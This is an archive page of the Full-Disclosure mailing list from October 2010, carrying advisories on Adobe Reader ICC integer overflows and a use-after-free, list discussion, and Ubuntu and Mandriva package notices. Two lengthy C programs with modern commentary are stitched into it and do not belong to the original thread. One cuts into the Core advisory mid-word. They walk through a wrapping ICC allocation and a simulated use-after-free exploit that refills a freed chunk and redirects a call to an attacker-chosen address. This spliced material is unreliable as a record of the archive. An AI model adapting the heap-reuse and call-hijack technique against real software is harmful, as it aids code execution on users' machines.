Re: [Full-disclosure] ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability

2010-10-06 Thread Dan Kaminsky
>
> Well, awesome. This sounds near-identical to some issues that the Sun JRE
> had a few years back[1]. I wonder if the code shares a common lineage? :)
>
>
No common lineage required; ICC's filled with 32-bit element counts.
They're always int overflow bait.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability

2010-10-06 Thread Chris Evans
On Wed, Oct 6, 2010 at 11:28 AM, ZDI Disclosures <
zdi-disclosu...@tippingpoint.com> wrote:

> ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-10-191
> October 6, 2010
>
> -- CVE ID:
> CVE-2010-3621
>
> -- CVSS:
> 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
>
> -- Affected Vendors:
> Adobe
>
> -- Affected Products:
> Adobe Reader
>
> -- Vulnerability Details:
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of Adobe Reader. User interaction is required
> in that a target must be coerced into opening a file or visiting a web
> page.
>
> The specific flaw exists within the ACE.dll module responsible for
> parsing ICC streams. When processing an ICC stream, the process performs
> math on two DWORD values from the input file. If these values wrap over
> the maximum integer value of 0x a mis-allocation can occur.
> Later, the process uses one of the original DWORD values as a size to a
> copy function. This can be abused by an attacker to overflow a stack
> buffer and subsequently execute code under the context of the user
> running the process.
>

Well, awesome. This sounds near-identical to some issues that the Sun JRE
had a few years back[1]. I wonder if the code shares a common lineage? :)


Cheers
Chris

[1] - http://scary.beasts.org/security/CESA-2006-004.html
http://scary.beasts.org/misc/jdk/badicc.jpg
(And additional integer problems not released at the time)
http://scary.beasts.org/misc/jdk/badicc2.jpg
http://scary.beasts.org/misc/jdk/badicc3.jpg
http://scary.beasts.org/misc/jdk/badicc4.jpg
http://scary.beasts.org/security/CESA-2007-005.html

In addition, there have been plenty of bugs against lcms[2] and Apple's ICC
profile parser.
So it seems like ICC profile parsing is hard ;-)

[2] - http://scary.beasts.org/security/CESA-2009-003.html


> -- Vendor Response:
> Adobe has issued an update to correct this vulnerability. More
> details can be found at:
>
> http://www.adobe.com/support/security/bulletins/apsb10-21.html
>
> -- Disclosure Timeline:
> 2010-06-23 - Vulnerability reported to vendor
> 2010-10-06 - Coordinated public release of advisory
>
> -- Credit:
> This vulnerability was discovered by:
>* Sebastian Apelt (www.siberas.de)
>

Re: [Full-disclosure] WikiLeaks

2010-10-06 Thread Harry Behrens
  Two days ago I managed to find somebody ("Anny") on their web chat. 
She didn't say much, only that it's supposed to be up in a week or so 
and that the issues are technical vs. political.

I still believe it smells of fish.
And to kinda paraphrase: Just because J Assange is a raving paranoid 
doesn't mean they aren't out to get him...

 -h

On 06.10.2010 20:06, Juha-Matti Laurio wrote:
> It's the newest tweet still.
>
> Juha-Matti
>
> Jeffrey Walton [noloa...@gmail.com] wrote:
>> The latest is kind of funny ("Latest smear attempt: Chinese spy agency
>> gave WikiLeaks $20M").
>>
>> Just call it a 'PAC Contribution' and everything will be fine.
>>
>> On Mon, Oct 4, 2010 at 7:05 AM, Juha-Matti Laurio
>>  wrote:
>> > And nothing related is not tweeted at
>> > http://twitter.com/wikileaks
>> >
>> > Juha-Matti
>> >
>> > Harry Behrens [ha...@behrens.com] wrote:
>> >>   for 5 days and nothing about this to be found on google.
>> >>
>> >> Does anybody have an idea what is happening here - it does smell
>> >> slightly fishy...
>> >>
>> >>  -h
>
>



Re: [Full-disclosure] WikiLeaks

2010-10-06 Thread Cal Leeming [Simplicity Media Ltd]
  I'm not sure why everyone is so fussed about this tbh..

And surely, full-disclosure is no place for such a discussion either..



On 06/10/2010 19:06, Juha-Matti Laurio wrote:
> It's the newest tweet still.
>
> Juha-Matti
>
>> Jeffrey Walton [noloa...@gmail.com] wrote:
>> The latest is kind of funny ("Latest smear attempt: Chinese spy agency
>> gave WikiLeaks $20M").
>>
>> Just call it a 'PAC Contribution' and everything will be fine.
>>
>> On Mon, Oct 4, 2010 at 7:05 AM, Juha-Matti Laurio
>>   wrote:
>>> And nothing related is not tweeted at
>>> http://twitter.com/wikileaks
>>>
>>> Juha-Matti
>>>
>>> Harry Behrens [ha...@behrens.com] wrote:
>>>>   for 5 days and nothing about this to be found on google.
>>>>
>>>> Does anybody have an idea what is happening here - it does smell
>>>> slightly fishy...
>>>>
>>>>   -h



[Full-disclosure] Massive Black Hat Seo Campaign in progress ?

2010-10-06 Thread exploit dev
Hi to all,

I posted something about a massive black hat seo campaign that seem in
progress. If you are interested check

http://extraexploit.blogspot.com/2010/10/dollars-javascript-code-yet-another_06.html

and

http://extraexploit.blogspot.com/2010/10/dollars-javascript-code-yet-another.html

Feedback is welcome.

Thank you very much to all for your attention.



-- 
http://extraexploit.blogspot.com

[Full-disclosure] ZDI-10-193: Adobe Acrobat Reader Multimedia Playing Remote Code Execution Vulnerability

2010-10-06 Thread ZDI Disclosures
ZDI-10-193: Adobe Acrobat Reader Multimedia Playing Remote Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-193
October 6, 2010

-- CVE ID:
CVE-2010-3632

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10538. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat Reader. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the application explicitly trusting a
string's length embedded within a particular file format. The
application will duplicate an arbitrarily sized string into a statically
sized buffer located on the stack. This can lead to code execution under
the context of the application.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-21.html

-- Disclosure Timeline:
2010-08-25 - Vulnerability reported to vendor
2010-10-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] ZDI-10-192: Adobe Acrobat Reader ICC mluc Remote Code Execution Vulnerability

2010-10-06 Thread ZDI Disclosures
ZDI-10-192: Adobe Acrobat Reader ICC mluc Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-192
October 6, 2010

-- CVE ID:
CVE-2010-3622

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Reader

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Reader. User interaction is required
in that a target must be coerced into opening a file or visiting a web
page.

The specific flaw exists within the ACE.dll module responsible for
parsing ICC streams. Within the 'desc' tag there exists an embedded
'mluc' data structure. The code within ACE performs arithmetic on the
second DWORD from the mluc structure and a value from the desc
structure. The resulting integer is used for an allocation of a
heap-based buffer. An attacker can forge these values to force the
process to under-allocate this buffer and later overflow it during a
copy operation. This leads to remote code execution under the context of
the user running the application.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-21.html

-- Disclosure Timeline:
2010-06-23 - Vulnerability reported to vendor
2010-10-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt  (www.siberas.de)




[Full-disclosure] ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability

2010-10-06 Thread ZDI Disclosures
ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-191
October 6, 2010

-- CVE ID:
CVE-2010-3621

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Reader

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Reader. User interaction is required
in that a target must be coerced into opening a file or visiting a web
page.

The specific flaw exists within the ACE.dll module responsible for
parsing ICC streams. When processing an ICC stream, the process performs
math on two DWORD values from the input file. If these values wrap over
the maximum integer value of 0x a mis-allocation can occur.
Later, the process uses one of the original DWORD values as a size to a
copy function. This can be abused by an attacker to overflow a stack
buffer and subsequently execute code under the context of the user
running the process.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-21.html

-- Disclosure Timeline:
2010-06-23 - Vulnerability reported to vendor
2010-10-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (www.siberas.de)


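The two ICC advisories above (ZDI-10-191 and ZDI-10-192) describe one pattern: two DWORDs read straight from the profile are combined in 32-bit arithmetic, the wrapped result sizes an allocation, and a later copy trusts one of the original values. The C program below is an added illustration of that pattern, not Adobe's or ZDI's code, and it does not claim to reproduce ACE.dll's logic. It walks an ICC 'mluc' tag using the layout from the ICC specification (signature, reserved, record count, record size, then 12-byte records of language, country, string length and string offset, followed by UTF-16BE strings) and shows the unchecked count * record-size product next to a checked version that refuses to wrap. Both tag byte strings are constructed for the example; the second one carries a record count chosen so that count * 12 wraps to 8.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ICC profile data is big-endian. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* The unsafe pattern: record count and record size are two DWORDs taken from
 * the file and multiplied in 32-bit arithmetic. The product silently wraps, so a
 * huge count yields a tiny table length while a copy loop still runs count times. */
uint32_t mluc_table_len_unchecked(uint32_t count, uint32_t rec_size) {
    return count * rec_size;
}

/* Hardened: reject a record size below the 12 bytes the spec defines, detect the
 * multiplication overflow before it happens, and bound the table by the bytes
 * actually present in the tag. Writes the table length to *out on success. */
int mluc_table_len_checked(uint32_t count, uint32_t rec_size, size_t tag_len, size_t *out) {
    if (rec_size < 12) return -1;
    if (count != 0 && rec_size > UINT32_MAX / count) return -1;   /* would wrap */
    uint64_t need = 16 + (uint64_t)count * rec_size;               /* header + records */
    if (need > tag_len) return -1;
    *out = (size_t)(need - 16);
    return 0;
}

/* Validate a whole 'mluc' tag and copy its first string into out (UTF-16BE,
 * ASCII range only for this example). Returns the record count, or -1. */
int parse_mluc(const uint8_t *tag, size_t tag_len, char *out, size_t out_cap) {
    if (tag_len < 16 || memcmp(tag, "mluc", 4) != 0 || out_cap == 0) return -1;
    uint32_t count = be32(tag + 8), rec_size = be32(tag + 12);
    size_t table_len;
    if (mluc_table_len_checked(count, rec_size, tag_len, &table_len) != 0) return -1;
    out[0] = '\0';
    for (uint32_t i = 0; i < count; i++) {
        const uint8_t *rec = tag + 16 + (size_t)i * rec_size;   /* inside tag: checked above */
        uint32_t slen = be32(rec + 4), soff = be32(rec + 8);
        /* offset + length is checked in 64 bits so this sum cannot wrap either */
        if ((slen & 1) || (uint64_t)soff + slen > tag_len) return -1;
        if (i == 0) {
            size_t k = 0;
            for (uint32_t j = 0; j + 1 < slen && k + 1 < out_cap; j += 2)
                out[k++] = tag[soff + j] == 0 ? (char)tag[soff + j + 1] : '?';
            out[k] = '\0';
        }
    }
    return (int)count;   /* bounded by tag_len / 12, so it fits */
}

/* Constructed sample: one record, "en"/"US", 8-byte UTF-16BE "Test" at offset 28. */
const uint8_t SAMPLE_MLUC_OK[36] = {
    'm','l','u','c',  0,0,0,0,  0,0,0,1,  0,0,0,12,
    'e','n','U','S',  0,0,0,8,  0,0,0,28,
    0,'T',0,'e',0,'s',0,'t'
};
/* Constructed sample: count 0x15555556 * 12 = 0x100000008, which wraps to 8. */
const uint8_t SAMPLE_MLUC_WRAP[36] = {
    'm','l','u','c',  0,0,0,0,  0x15,0x55,0x55,0x56,  0,0,0,12,
    'e','n','U','S',  0,0,0,8,  0,0,0,28,
    0,'T',0,'e',0,'s',0,'t'
};

int main(void) {
    char name[16];
    int n = parse_mluc(SAMPLE_MLUC_OK, sizeof SAMPLE_MLUC_OK, name, sizeof name);
    printf("valid tag: %d record(s), first string \"%s\"\n", n, name);
    printf("wrapped tag: unchecked table length %u bytes, checked parse -> %d\n",
           mluc_table_len_unchecked(0x15555556u, 12u),
           parse_mluc(SAMPLE_MLUC_WRAP, sizeof SAMPLE_MLUC_WRAP, name, sizeof name));
    return 0;
}
```

The checked path does the arithmetic in 64 bits and compares against the bytes the tag really has; that is the whole fix for this bug class, and it applies equally to the string offset and length inside each record, which the parser also bounds before copying.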


Re: [Full-disclosure] WikiLeaks

2010-10-06 Thread Juha-Matti Laurio
It's the newest tweet still.

Juha-Matti

Jeffrey Walton [noloa...@gmail.com] wrote:
> The latest is kind of funny ("Latest smear attempt: Chinese spy agency
> gave WikiLeaks $20M").
> 
> Just call it a 'PAC Contribution' and everything will be fine.
> 
> On Mon, Oct 4, 2010 at 7:05 AM, Juha-Matti Laurio
>  wrote:
> > And nothing related is not tweeted at
> > http://twitter.com/wikileaks
> >
> > Juha-Matti
> >
> > Harry Behrens [ha...@behrens.com] wrote:
> >>   for 5 days and nothing about this to be found on google.
> >>
> >> Does anybody have an idea what is happening here - it does smell
> >> slightly fishy...
> >>
> >>      -h



[Full-disclosure] (CORE-2010-0701) Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability

2010-10-06 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://corelabs.coresecurity.com/

Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability



1. *Advisory Information*

Title: Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability
Advisory Id: CORE-2010-0701
Advisory URL:
[http://www.coresecurity.com/content/adobe-acrobat-acrord23-reader-use-after-free]
Date published: 2010-10-05
Date of last update: 2010-10-05
Vendors contacted: Adobe
Release mode: Coordinated release



2. *Vulnerability Information*

Class: Use after free [CWE-416]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-3627
Bugtraq ID: N/A



3. *Vulnerability Description*

Adobe Acrobat Reader is prone to a use-after-free vulnerability due to
an invalid usage of a released memory chunk. This vulnerability could be
used by a remote attacker to execute arbitrary code, by enticing the
user of Adobe Acrobat Reader to open a specially crafted file and click
on PAGES thumbnails.


4. *Vulnerable packages*

   . Adobe Acrobat Reader 9.x


5. *Non-vulnerable packages*

   . Adobe Acrobat Reader 8.x


6. *Solutions and Workarounds*

For further information about this issue look at the Adobe Security
Bulletin and security blogs:

   . Adobe Security Bulletins and Advisories:
[http://www.adobe.com/support/security].
   . PSIRT blog: [http://blogs.adobe.com/psirt].


7. *Credits*

This vulnerability was discovered and researched by Ricardo Narvaja,
from Core Security Technologies. This publication was coordinated by
Fernando Russ.


8. *Technical Description*

Adobe Acrobat Reader is prone to a use-after-free vulnerability due to
an invalid usage of a released memory chunk. A specially crafted '.pdf'
file containing special flash code triggers an 'ACCESS_VIOLATION'
reading at address 0x0030.

A more careful analysis of that code indicates that ESI points to a
released chunk of memory. Exploitation is feasible by forcing the
allocation process of Adobe Acrobat Reader to reuse the chunk pointed to
by ESI with specially controlled data.

/-
00EE10F8  MOV ECX,DWORD PTR DS:[ESI+1C]   <-- ESI points to a
                                              previously released memory chunk.
00EE10FB  MOV DWORD PTR SS:[EBP+78],EAX
00EE10FE  MOV EAX,DWORD PTR DS:[ESI+18]
00EE1101  PUSH EAX
00EE1102  CALL DWORD PTR DS:[ECX+30]      <-- The execution flow
                                              depends on the content of ECX
                                              (ECX depends on ESI).

- -/
 The contents of the CPU registers when the 'ACCESS_VIOLATION' read was
triggered at 0x00EE1102:

/-

EAX 
ECX 
EDX 014D0A40
EBX 
ESP 0013F1BC
EBP 0013F24C
ESI 02D5782C
EDI 10A7C3D0
EIP 00EE1102

- -/
 This vulnerability could result in arbitrary code execution, although
it was not verified.


9. *Report Timeline*

. 2010-07-05:
Core Security Technologies notifies the Adobe team of the vulnerability
and announces its initial plan to publish the advisory on July 26th,
2010. A Proof of Concept (PoC) was sent to Adobe team.

. 2010-07-06:
Adobe team acknowledges Core Security Technologies' e-mail. Vendor also
notifies that their world-wide offices will be shut down from July 5th
to July 11th, and it may take a bit longer than usual to investigate
this issue.

. 2010-07-22:
Core asks for a status update about this issue.

. 2010-07-22:
Adobe team notifies that they have reproduced the issue and expect the
fix to be available in the next quarterly security update for Acrobat
and Adobe Reader. These fixes are currently scheduled for an October
patch Tuesday release.

. 2010-07-26:
Core notifies that the publication date for this advisory was
re-scheduled to October 12th, 2010.

. 2010-07-27:
Core notifies that the publication date of October 12th, 2010 should be
considered as final. If Adobe team does not release a patch on that day,
Core will be forced to release this advisory in user-release mode.

. 2010-09-28:
Core notifies that the publication date of October 12th, 2010 is still
valid and asks for a status update.

. 2010-09-29:
Adobe acknowledges the communication by informing that the publication
date was re-scheduled to October 5th, 2010.

. 2010-10-04:
Core asks if the Adobe team has an assigned CVE identifier for this
vulnerability and which are the affected versions of Adobe Reader.

. 2010-10-04:
Adobe notifies that:

   . This issue affects Reader 9.x, but not Reader 8.x.
   . The assigned identifier for this vulnerability is CVE-2010-3627.

. 2010-10-05:
Core publishes advisory CORE-2010-0701.



10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vu
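The exploitation note in section 8 above (a stale ESI into a released chunk, the allocator coaxed into handing that chunk back filled with controlled data, then a CALL through a pointer fetched from it) is the generic heap use-after-free primitive. The C program below is an added illustration of that primitive and is not Core's or Adobe's code. It uses a toy LIFO allocator so the chunk reuse is deterministic and models the object -> table -> handler indirection the disassembly shows; the chunk size, the object layout and the 0x41414141 handler value are assumptions made for the demonstration. It returns the address the CALL would reach instead of calling it, so nothing jumps to a bogus address.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy fixed-size heap with a LIFO free list: the chunk freed most recently is
 * the one handed out next. Real allocators behave the same way for same-size
 * requests, which is what lets an attacker refill a freed object. */
#define CHUNK_SIZE 32
#define NCHUNKS 8

struct ops { void (*handler)(int); };        /* function table ("vtable") */
struct obj { struct ops *ops; int arg; };    /* object: first field points at its table */

union chunk {
    struct obj o;
    struct ops t;
    unsigned char raw[CHUNK_SIZE];
};
static union chunk arena[NCHUNKS];
static int free_list[NCHUNKS];
static int free_top;

void toy_heap_reset(void) {
    memset(arena, 0, sizeof arena);
    free_top = 0;
    for (int i = NCHUNKS - 1; i >= 0; i--) free_list[free_top++] = i;
}
union chunk *toy_alloc(void) { return free_top > 0 ? &arena[free_list[--free_top]] : NULL; }
void toy_free(union chunk *c) { free_list[free_top++] = (int)(c - arena); }

static int g_last_arg;
static void legit_handler(int a) { g_last_arg = a; }
static struct ops legit_ops = { legit_handler };

/* Attacker-chosen handler address (constructed value for the demonstration). */
#define FAKE_HANDLER 0x41414141u

/* Attacker step after the victim object is freed: request two same-size chunks
 * (LIFO reuse makes the first one the victim's own chunk) and fill them so that
 * obj.ops points at a fake table whose handler slot holds FAKE_HANDLER. */
static void refill_freed_chunk(void) {
    union chunk *reused = toy_alloc();
    union chunk *table  = toy_alloc();
    uintptr_t table_addr = (uintptr_t)table, fake_fn = FAKE_HANDLER;
    memcpy(reused->raw, &table_addr, sizeof table_addr);   /* obj.ops     -> fake table */
    memcpy(table->raw, &fake_fn, sizeof fake_fn);          /* ops.handler -> 0x41414141 */
}

/* Emulates MOV ECX,[ESI+..]; CALL [ECX+..]: fetch the table through the object,
 * then the function through the table. Returns the address that would be
 * called rather than calling it. */
uintptr_t dispatch_target(const struct obj *o) {
    const struct ops *tbl = o->ops;
    return (uintptr_t)tbl->handler;
}

/* Normal path: live object, dispatch reaches the legitimate handler. */
uintptr_t live_call_target(void) {
    toy_heap_reset();
    union chunk *c = toy_alloc();
    c->o.ops = &legit_ops; c->o.arg = 7;
    uintptr_t target = dispatch_target(&c->o);
    c->o.ops->handler(c->o.arg);                 /* sets g_last_arg = 7 */
    return target;
}

/* Vulnerable path: the object is freed but a copy of its pointer (the ESI of the
 * advisory) survives and is dereferenced after the chunk has been refilled. */
uintptr_t dangling_call_target(void) {
    toy_heap_reset();
    union chunk *c = toy_alloc();
    c->o.ops = &legit_ops; c->o.arg = 7;
    struct obj *stale = &c->o;
    toy_free(c);
    refill_freed_chunk();
    return dispatch_target(stale);               /* 0x41414141: attacker picks EIP */
}

/* Defensive pattern: release and drop the reference in one step, and refuse to
 * dispatch through a cleared reference. Returns 0 when no call would be made. */
uintptr_t released_call_target(void) {
    toy_heap_reset();
    union chunk *c = toy_alloc();
    c->o.ops = &legit_ops; c->o.arg = 7;
    struct obj *owner = &c->o;
    toy_free(c); owner = NULL;
    refill_freed_chunk();
    return owner ? dispatch_target(owner) : 0;
}

int main(void) {
    printf("live object  -> handler at %#lx\n", (unsigned long)live_call_target());
    printf("dangling ptr -> handler at %#lx\n", (unsigned long)dangling_call_target());
    printf("cleared ref  -> %#lx (no call made)\n", (unsigned long)released_call_target());
    return 0;
}
```

The dangling path returns 0x41414141 because the first same-size allocation after the free lands on the victim's chunk, exactly the reuse the advisory describes; in a real process the attacker additionally has to make that allocation happen (for example from script) between the free and the stale use.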

[Full-disclosure] [USN-1001-1] LVM2 vulnerability

2010-10-06 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-1001-1   October 06, 2010
lvm2 vulnerability
CVE-2010-2526
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  clvm  2.02.02-1ubuntu1.6

Ubuntu 8.04 LTS:
  clvm  2.02.26-1ubuntu9.1

Ubuntu 9.04:
  clvm  2.02.39-0ubuntu9.1

Ubuntu 9.10:
  clvm  2.02.39-0ubuntu11.1

Ubuntu 10.04 LTS:
  clvm  2.02.54-1ubuntu4.1

In general, a standard system update will make all the necessary changes.
In a clustering environment, you need to restart clvmd after the update.

Details follow:

The cluster logical volume manager daemon (clvmd) in LVM2 did not correctly
validate credentials. A local user could use this flaw to manipulate
logical volumes without root privileges and cause a denial of service in
the cluster.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6.diff.gz
  Size/MD5:23084 0b3f64de96c9b259a6ef2769946f1e23

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6.dsc
  Size/MD5:  798 2005fade3f0eab833f8dc298dff25dc4
http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02.orig.tar.gz
  Size/MD5:   477665 e5dfc205aaf673fecb3c1c15164d718c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_amd64.deb
  Size/MD5:   193890 fc1605c8d8358720167cc587b4c6e750

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_amd64.udeb
  Size/MD5:   198688 b34a16e5e6d7132690bc795b4462db6a

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_amd64.deb
  Size/MD5:   302348 afc947cfd64a2cf764ac824df3aa6714

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_i386.deb
  Size/MD5:   173624 2b7808f8cf8c3d04510514cac0e1e32a

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_i386.udeb
  Size/MD5:   171898 6ff8ce5077fc3ffa52facd8327ff8c30

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_i386.deb
  Size/MD5:   279694 ee0be92486aad4c98655ffeabb9066e6

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_powerpc.deb
  Size/MD5:   197078 bf2848d3a77e6fdef5bf3fd72ce4c97d

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_powerpc.udeb
  Size/MD5:   189558 43368dbc246f5ccf7bbe5f837ff607d4

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_powerpc.deb
  Size/MD5:   305146 2bf0804f159411ebd16ece0e1f4c3e88

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_sparc.deb
  Size/MD5:   192050 7bfe11bf05d122ace63b13bc097d02b1

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_sparc.udeb
  Size/MD5:   195832 0d0fc85a2db41997003d64ee2b97c11f

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_sparc.deb
  Size/MD5:   301914 08c3ec1d2b497c0ea7dacbf60e8bd00a

Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26-1ubuntu9.1.diff.gz
  Size/MD5:17226 7ad064c5e17a791ea9ff7138a8b43b8b

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26-1ubuntu9.1.dsc
  Size/MD5:  875 19693df12de08471c95d38b7125ddb52
http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26.orig.tar.gz
  Size/MD5:   532355 caa50b5ebd4f27ba57836a805f49e6da

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.26-1ubuntu9.1_amd64.deb
  Size/MD5:   212496 fdbd428da1cc23930edb747344f1e614

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.26-1ubuntu9.1_amd64.udeb
  Size/MD5:   219252 913d218ec8a6f69b2fec929819eb3ef5

http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26-1ubuntu9.1_amd64.deb
  Size/MD5:   333082 6ba529db36ba122830ea7ef38b59110d

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.26-1ubuntu9.1_i386.deb
  Size/MD5:   202906 6f5d873b18820bce3d709b97fef42e8d

http://security.ubuntu.com/ubuntu/p

Re: [Full-disclosure] Webserver-Security and Virtualization

2010-10-06 Thread Claudio Criscione
On Wednesday, 6 October 2010 13:40:49, Marcel Grabher (sallas) wrote:
> I'm working on a paper about Webserver-Security (free).
> Objective: One should know about the risks and what can be done to mitigate
> them.
> http://webservsec.blogspot.com/2010/10/threats.html

I'm missing the virtualization part here. BTW, I'm not sure a simple box model 
can capture all the complex threats involved...

@paradoxengine



[Full-disclosure] [ MDVSA-2010:197 ] postgresql

2010-10-06 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:197
 http://www.mandriva.com/security/
 ___

 Package : postgresql
 Date: October 6, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered and corrected in postgresql:
 
 An authenticated database user can manipulate modules and tied
 variables in some external procedural languages to execute code with
 enhanced privileges (CVE-2010-3433).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update provides a solution to these vulnerabilities.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3433
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 732b926f0654f432eb9520fc4b4d3f63  
2008.0/i586/libecpg5-8.2.18-0.1mdv2008.0.i586.rpm
 584ad08b4fd7e237172a90837fcf3dc5  
2008.0/i586/libecpg-devel-8.2.18-0.1mdv2008.0.i586.rpm
 340e166ffca9a8758c6512959f770571  
